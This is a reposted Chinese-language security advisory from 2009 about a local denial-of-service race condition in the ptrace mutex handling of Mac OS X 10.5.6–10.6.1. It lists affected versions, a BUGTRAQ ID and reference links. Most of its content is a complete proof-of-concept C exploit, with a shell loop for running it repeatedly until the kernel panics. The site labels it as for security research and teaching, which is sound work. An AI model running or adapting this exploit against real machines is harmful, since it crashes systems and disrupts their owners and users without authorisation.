Apple Mac OS X ptrace互斥锁处理本地拒绝服务漏洞
来源:岁月联盟
时间:2009-11-11
Apple Mac OS X 10.6.1Apple Mac OS X 10.5.7Apple Mac OS X 10.5.6漏洞描述:
BUGTRAQ ID: 36915Mac OS X是苹果家族机器所使用的操作系统。Mac OS X的ptrace实现中在处理互斥锁时存在竞争条件,当系统内核试图与释放的互斥体相互锁定时可能触发这个错误,导致内核忙碌。<*参考
Micheal Turner (wh1t3h4t3@yahoo.co.uk)*>测试方法:[www.sebug.net]
链接:http://secunia.com/advisories/37238/
http://marc.info/?l=full-disclosure&m=125734118204158&w=2
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!
/* Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS ================================================== This code should be run in a loop and due to problems with mutex handling in ptrace a DoS can occur when a destroyed mutex is attempted to be interlocked by OSX kernel giving rise to a race condition. You may need to run this code multiple times. - Tested against 10.5.6 - Tested against 10.5.7 - Tested against 10.6.1 while `true`;do ./prdelka-vs-APPLE-ptracepanic;done -- prdelka*/#include <sys/types.h>#include <sys/ptrace.h>#include <stdio.h>#include <stdlib.h>int main(){ pid_t pid; char *argv[] = {"id","","",0}; char *envp[] = {"",0}; pid = fork(); if(pid == 0){ usleep(100); execve("/usr/bin/id",argv,envp); } else{ usleep(820); if(ptrace(PT_ATTACH,pid,0,0)==0){ printf("[ PID: %d has been caught!/n",pid); if(ptrace(PT_DETACH,pid,0,0)<0){ perror("Evil happens."); } usleep(1); wait(0); } else{ perror("Fail!"); } } return(0);}SEBUG安全建议:
厂商补丁:Apple-----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.apple.com
上一篇:浏览器漏洞火狐占比最高